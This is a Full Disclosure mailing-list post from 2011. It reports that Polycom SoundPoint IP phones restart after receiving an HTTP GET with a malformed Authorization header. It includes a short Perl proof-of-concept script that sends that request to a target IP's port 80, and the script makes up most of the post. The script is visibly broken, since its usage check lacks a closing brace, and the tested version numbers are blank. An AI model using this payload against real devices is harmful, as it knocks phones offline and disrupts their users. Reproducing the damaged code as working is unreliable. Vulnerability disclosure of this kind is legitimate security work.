Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Polycom SoundPoint IP DoS
From: Pawel Gawinek <harston () home pl>
Date: Thu, 27 Jan 2011 02:21:52 +0100


Polycom SoundPoint IP devices (IP phones) are vulnerable to Denial of 
Service attacks. Sending HTTP GET request with broken Authorization 
header effect a device restart after ~60 seconds.

It was tested on:

SoundPoint IP 335 (Version:
SoundPoint IP 430 (Version:
SoundPoint IP 450 (Version:

Proof Of Concept:

use IO::Socket;
use strict;
use warnings;

if (!$ARGV[0]) {
         print "Usage: $0 [IP]\n";

my $socket = IO::Socket::INET->new(
         Proto => "tcp",
         PeerAddr => "$ARGV[0]",
         PeerPort => "80") || die "Error $!";

print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic\r\n\r\n";
#print $socket "GET /reg_1.htm HTTP/1.1\r\nAuthorization: Basic \0\r\n\r\n";

best regards
pawel gawinek

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Polycom SoundPoint IP DoS Pawel Gawinek (Jan 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]